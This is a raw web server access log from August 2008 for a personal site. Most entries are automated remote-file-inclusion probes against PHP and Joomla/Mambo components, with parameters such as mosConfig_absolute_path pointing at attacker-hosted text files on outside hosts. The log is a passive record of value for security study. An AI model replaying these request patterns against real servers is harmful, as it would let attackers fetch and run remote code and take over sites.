153.19.161.46 - - [28/Aug/2008:10:26:34 -0700] "GET /logs/access_080118.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:26:39 -0700] "GET /logs/access_080214.log/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:27:21 -0700] "GET /logs/access_080224.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:27:22 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:27:22 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:27:53 -0700] "GET /logs/access_080820.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:28:05 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:28:05 -0700] "GET //config.php?path_to_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:28:05 -0700] "GET /logs/access_080226.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:28:06 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:28:28 -0700] "GET /!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:28:31 -0700] "GET /logs/errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.1.16.230 - - [28/Aug/2008:10:28:31 -0700] "GET /errors.php?error=http://lansites.ru//language/lang_english/indoserv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:28:37 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:28:47 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0093.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:30:03 -0700] "GET /logs/access_080725.log/senetman/html/index.php?page=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.214.57.24 - - [28/Aug/2008:10:30:06 -0700] "GET /logs/access_080621.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.bodabagtribe.net/.../image.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:25 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:25 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:25 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:30:27 -0700] "GET /!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:28 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:29 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:29 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:32 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.120.234.168 - - [28/Aug/2008:10:30:35 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:30:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017a.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:30:43 -0700] "GET /logs/access_080227.log//include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:30:43 -0700] "GET //include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:30:44 -0700] "GET /logs//include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:31:11 -0700] "GET /logs/!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:31:11 -0700] "GET /!scanhttp://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:31:36 -0700] "GET //include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:31:36 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.224.234 - - [28/Aug/2008:10:31:36 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:31:41 -0700] "GET /logs/access_080720.log//contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:31:42 -0700] "GET //contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:31:47 -0700] "GET /logs/access_080220.log/?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:31:48 -0700] "GET /?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 85219 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:31:48 -0700] "GET /logs/?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 62571 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:31:55 -0700] "GET /logs/access_080221.log/?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:31:55 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:31:55 -0700] "GET /logs/access_080106.log/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:31:55 -0700] "GET /logs/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:31:55 -0700] "GET /send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:32:01 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:32:02 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:32:02 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:32:05 -0700] "GET /logs/access_080410.log//include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:07 -0700] "GET /logs/access_080106.log/send_reminders.php?includedir=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:32:07 -0700] "GET /logs//contenido.php?sec=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:32:07 -0700] "GET //contenido.php?sec=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:08 -0700] "GET /send_reminders.php?includedir=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:32:09 -0700] "GET /logs/access_080804.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:32:09 -0700] "GET /errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:32:10 -0700] "GET /logs/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:32:11 -0700] "GET /logs/access_080507.log//contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:15 -0700] "GET /logs/access_080111.log/send_reminders.php?includedir=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:15 -0700] "GET /logs/send_reminders.php?includedir=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:32:15 -0700] "GET /logs/access_080321.log/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:32:15 -0700] "GET /extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:32:15 -0700] "GET /logs/access_080815.log/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:32:15 -0700] "GET /logs/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:32:19 -0700] "GET /logs/access_080227.log//include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:32:20 -0700] "GET /logs/access_080625.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:32:21 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:32:21 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:32:25 -0700] "GET /logs/access_080324.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:32:34 -0700] "GET //include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:32:34 -0700] "GET /logs//include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:32:49 -0700] "GET /logs/access_080621.log/errors.php?error=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:54 -0700] "GET /logs/extcalendar.php?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:54 -0700] "GET /logs/access_080321.log/extcalendar.php?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [28/Aug/2008:10:32:59 -0700] "GET /logs/access_071222.log/extcalendar.php?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.103.152.151 - - [28/Aug/2008:10:33:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.103.152.151 - - [28/Aug/2008:10:33:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://albgroup.100megsfree8.com/Id/Bid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:07 -0700] "GET /logs//contenido.php?sec=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:07 -0700] "GET /logs//contenido.php?sec=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:07 -0700] "GET /logs//contenido.php?sec=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:07 -0700] "GET //contenido.php?sec=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:08 -0700] "GET //contenido.php?sec=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:08 -0700] "GET /logs//contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:08 -0700] "GET //contenido.php?sec=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:08 -0700] "GET //contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:08 -0700] "GET /logs//contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:33:09 -0700] "GET //contenido.php?sec=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:10:33:10 -0700] "GET /logs/access_080725.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:10:33:11 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.116 - - [28/Aug/2008:10:33:11 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.37 - - [28/Aug/2008:10:33:11 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_28/ HTTP/1.1" 200 1041 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:33:12 -0700] "GET /extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:33:12 -0700] "GET /logs/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:33:12 -0700] "GET /logs/access_080321.log/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [28/Aug/2008:10:33:13 -0700] "GET /logs/access_071222.log/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.130.2.24 - - [28/Aug/2008:10:33:26 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.130.2.24 - - [28/Aug/2008:10:33:26 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.130.2.24 - - [28/Aug/2008:10:33:26 -0700] "GET /logs/access_080625.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:33:29 -0700] "GET /logs/access_080711.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:33:30 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:33:30 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:33:30 -0700] "GET /logs/access_080711.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:33:31 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.75.87.201 - - [28/Aug/2008:10:33:31 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
62.149.232.117 - - [28/Aug/2008:10:33:31 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:33:40 -0700] "GET /logs/access_080111.log/send_reminders.php?includedir=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.130.2.24 - - [28/Aug/2008:10:33:46 -0700] "GET /logs/access_080810.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
121.124.127.40 - - [28/Aug/2008:10:33:57 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.61.208.77 - - [28/Aug/2008:10:34:01 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
216.55.159.47 - - [28/Aug/2008:10:34:15 -0700] "GET /?mosConfig_absolute_path=http://elsalsete.com/galeria/imagenes/gnThumbNail/id.txt? HTTP/1.1" 200 85219 "-" "libwww-perl/5.803" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:34:21 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:34:22 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:34:22 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:34:36 -0700] "GET /logs/access_080410.log//include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [28/Aug/2008:10:34:40 -0700] "GET //include.php?path[docroot]=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.151.141.18 - - [28/Aug/2008:10:34:53 -0700] "GET /logs/access_071222.log/extcalendar.php?mosConfig_absolute_path=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.93.217.235 - - [28/Aug/2008:10:34:59 -0700] "GET /logs//index.php?option=com_registration&task=register/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
